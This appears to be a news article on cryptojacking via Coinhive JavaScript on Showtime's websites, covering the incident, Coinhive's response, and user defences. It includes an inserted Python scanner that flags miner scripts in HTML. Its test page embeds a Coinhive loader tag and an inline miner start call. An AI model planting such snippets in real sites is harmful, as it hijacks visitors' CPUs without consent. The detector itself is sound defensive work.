Showtime’s Web sites roped visitors’ CPU into mining cryptocurrency

Here’s the latest good reason for users to block JavaScript: if you don’t, your computer’s CPU power could be used to mine cryptocurrency without your knowledge or consent.

Cryptocurrency mining in the browser

The option to transfer the burden and cost of mining cryptocurrency on to end users through mining software has long been available. But the latest iteration of this approach does not require malware to be installed on users’ machines.

Instead, their computer’s processing power can be “enlisted” through a simple piece of JavaScript embedded in a Web site’s code. The JavaScript keeps “mining” – i.e. calculating hashes with an algorithm called Cryptonight – until the user leaves the website or closes the tab.

This option was made available by Coinhive, a project that provides the JavaScript code to website owners and effectively pays them for implementing it. Coinhive keeps around 30% of the value of the mined Monero to keep functioning and turn a profit themselves.

It is supposed to be an alternative way for site owners to earn money, instead of doing it by showing intrusive ads. It’s meant to be a win for everybody – Web site owners, visitors, and the Coinhive team – as the mining was not supposed to be kept secret from the users.

Every technology can be used for good and bad

Unfortunately, it didn’t take long for unscrupulous actors to start compromising popular browser extensions and Web sites and outfitting them with the mining JavaScript.

The latest incident involved several Web sites of CBS’s subsidiary Showtime. According to The Register, Showtime.com and ShowtimeAnytime.com were equipped with the mining code and, for a couple of days, consumed as much as 60 percent of visitors’ CPU capacity.

The script was removed on Monday, but the question of who put it there remains. Showtime is still not commenting on the incident, and New Relic, a web analytics company within whose HTML comment tags the script was nestled, says they had nothing to do with the code.

“Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic’s agents. It appears they were added to the website by its developers,” the company spokesperson said.

The Coinhive team did not reveal details about the owner of the account associated with that particular mining code, but confirmed that the email address associated with it is not an official CBS address.

What now?

Some users have been safe from this “attack” for a while, as many ad-blockers are already blocking the Coinhive script. Another easy solution is to simply disable JavaScript in your browser.

If your computer has slowed down and you suspect a miner is the reason, you can use Task Manager (on Windows) or Activity Monitor (on Mac) to check whether CPU usage is abnormally high and, if it is, to pinpoint the cause.
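Ad-blockers do this by matching the script’s source; the same check can be run over a page’s HTML offline. The scanner below is an added example, not code from the article, Showtime or Coinhive: it flags script tags that load or invoke an in-browser miner and keeps the nearest preceding HTML comment as context, since the Showtime script sat between comment tags. The Coinhive host and constructor names it matches on, and the sample page, are assumptions constructed for this example.

```python
from html.parser import HTMLParser

# Indicators assumed for this example: the Coinhive loader host and the
# constructor name its library exposed. Extend both tuples with your own list.
MINER_HOSTS = ("coinhive.com",)
MINER_INLINE_MARKERS = ("CoinHive.Anonymous", "CoinHive.User", "coinhive.min.js")

class MinerScriptScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, line, detail, preceding_comment) per hit
        self._in_script = False
        self._script_line = 0
        self._last_comment = ""  # nearest preceding HTML comment, kept as context

    def handle_comment(self, data):
        self._last_comment = data.strip()

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script, self._script_line = True, self.getpos()[0]
        src = (dict(attrs).get("src") or "").lower()
        if any(host in src for host in MINER_HOSTS):
            self.findings.append(("external", self._script_line, src, self._last_comment))

    def handle_data(self, data):  # inline <script> bodies arrive here as raw text
        if self._in_script:
            hits = [m for m in MINER_INLINE_MARKERS if m in data]
            if hits:
                self.findings.append(("inline", self._script_line, hits[0], self._last_comment))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def scan_html(html):
    # Returns the findings for one page's HTML; an empty list means nothing matched.
    scanner = MinerScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: a miner loader placed after a vendor-looking comment,
# followed by a benign first-party script that must not be flagged.
SAMPLE_PAGE = """<html><head>
<!-- vendor-analytics start (constructed) -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER'); m.start();</script>
<script src="/static/app.js"></script></head><body></body></html>"""
```

Running `scan_html(SAMPLE_PAGE)` reports the external loader on line 3 and the inline constructor call on line 4, both tagged with the comment that precedes them, while the first-party script produces no finding.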

As for Coinhive?

“It’s probably too late to do anything about the adblockers that already prevent our current JavaScript from loading. Instead, we will focus on a new implementation that requires an explicit opt-in from the end user to run,” the team noted in a recent blog post.

“We will verify this opt-in on our servers and will implement it in a way that it can not be circumvented. We will pledge to keep the opt-in intact at all times, without exceptions. This way we hope to convince ad-block extensions to not block this new implementation, but instead, see it as just another JavaScript library that you can integrate on your site.”
